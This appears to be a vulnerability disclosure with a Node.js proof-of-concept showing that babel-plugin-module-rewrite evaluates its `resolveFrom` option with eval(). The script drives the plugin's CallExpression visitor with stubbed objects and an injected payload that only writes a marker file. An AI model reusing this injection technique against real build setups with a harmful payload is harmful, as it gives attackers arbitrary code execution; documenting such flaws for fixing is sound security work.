Package babel-plugin-module-rewrite: the plugin hands its `resolveFrom` option straight to `eval()`, so whoever controls that plugin option (it is attacker-controlled wherever the plugin configuration is) gets arbitrary code execution in the process running Babel. This is code injection rather than shell command injection. The example below drives the plugin's `CallExpression` exit visitor with a stubbed AST path and an options object whose `resolveFrom` string writes a marker file when evaluated.
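'use strict';

// PoC: babel-plugin-module-rewrite passes `state.opts.resolveFrom` to eval(),
// so anyone who controls that plugin option executes arbitrary code inside the
// process running Babel. Run against the vulnerable package version; on success
// a marker file 'exploited.txt' is created in the current working directory.
const pkg = require('babel-plugin-module-rewrite');
const fs = require('fs');

// Minimal stand-in for the `babel` object the plugin factory receives. Only
// `types.isIdentifier` and `types.isMemberExpression` are provided; isIdentifier
// always answering true steers the visitor into the branch that evaluates
// `resolveFrom` (inferred from the PoC shape — confirm against the plugin
// source for the exact version under test). isMemberExpression deliberately
// returns undefined, i.e. falsy.
const babelStub = {
  types: {
    isIdentifier() { return true; },
    isMemberExpression() {},
  },
};

// The two extra positional arguments are kept only because the original PoC
// passed them; nothing visible here shows the plugin reading them.
const plugin = pkg.default(babelStub, 1, 2);

// Fake AST path for a CallExpression with one StringLiteral argument, which is
// the node shape the visitor's `exit` handler inspects.
const callPath = {
  node: {
    callee: { object: '' },
    arguments: [{ type: 'StringLiteral' }],
  },
};

// The payload: the plugin eval()s `state.opts.resolveFrom` verbatim. It writes
// the marker file and then yields `['./']`, presumably so the plugin's own
// handling of the eval result sees the array it expects (unconfirmed here; the
// marker file is the only effect this PoC checks).
const state = {
  opts: { resolveFrom: `require('fs').writeFileSync('exploited.txt','');['./']` },
  file: {
    opts: {
      filename: 'babel-plugin-module-rewrite-0.2.0_poc.js',
    },
  },
};

// Trigger the vulnerable visitor hook with the crafted path and options.
plugin.visitor.CallExpression.exit(callPath, state);

// Report the outcome instead of exiting silently, so a failed run (e.g. a
// patched version, or a plugin version with a different visitor shape) is
// distinguishable from a successful one. 'exploited.txt' is the path the
// payload string above writes.
if (fs.existsSync('exploited.txt')) {
  console.log('[+] payload executed: exploited.txt was created via eval()');
} else {
  console.log('[-] exploited.txt not found: the visitor did not reach eval()');
}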